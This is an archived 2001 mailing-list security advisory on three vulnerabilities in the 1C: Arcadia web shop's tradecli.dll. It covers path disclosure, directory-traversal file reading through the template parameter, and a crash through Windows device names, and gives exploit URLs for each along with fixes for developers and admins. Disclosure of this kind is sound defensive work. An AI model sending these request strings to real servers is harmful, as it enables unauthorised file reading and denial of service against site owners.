--== NERF gr0up security advisory #2 ==-- Multiple vulnerabilities in web-shop 1C: Arcadia, in module tradecli.dll 1. Show path scripts directory. Exploit: http://host/scripts/tradecli.dll?template=nonexistfile Will show error message, witch consist full path to work dir (usually /scripts). Advice for developers: print this messages only to Event Log. 2. Read any file from drive. Description: tradecli.dll - language interpriteter of 1C: Arcadia. It will work up file, pointed in template, interpret tags, bigining with underline sysmbol (example, <_include...>), all the rest read without changes, put in ASCIIZ line and then print as result. Path, pointed in variable template, will not work up for special symbols, so you can get direcory up (..\) and the full path to file, you may read file only from drive, where lies work directory of tradecli.dll. Exploit: http://host/script/tradecli.dll?template=..\..\..\..\..\path\to\file Reading of binary files will be embarrassing, because data after 0 symbol will'nt print. Advice for developers: check for existing file, pointed in template. Advice for admins: limit perms for tradecli.dll 3. Crash ISAPI-applications (DoS) Description: Opening of files: com1, com2, etc. Windows NT application will crash, that will crash all application (1C: Arcadia), consequently site. Exploit: http://host/scripts/tradecli.dll?template=com1 http://host/scripts/tradecli.dll?template=com2 http://host/scripts/tradecli.dll?template=com3 http://host/scripts/tradecli.dll?template=con http://host/scripts/tradecli.dll?template=prn http://host/scripts/tradecli.dll?template=aux Advice for developers: in Windows system befor openning file, you have to check file for existing (FindOpen etc.) Advice for admins: wait for next release ---------------------------------------------- Bug found by buggzy, NERF Security gr0up, 2001 www.nerf.ru, buggzyat_private
This archive was generated by hypermail 2b30 : Thu Jun 21 2001 - 16:55:09 PDT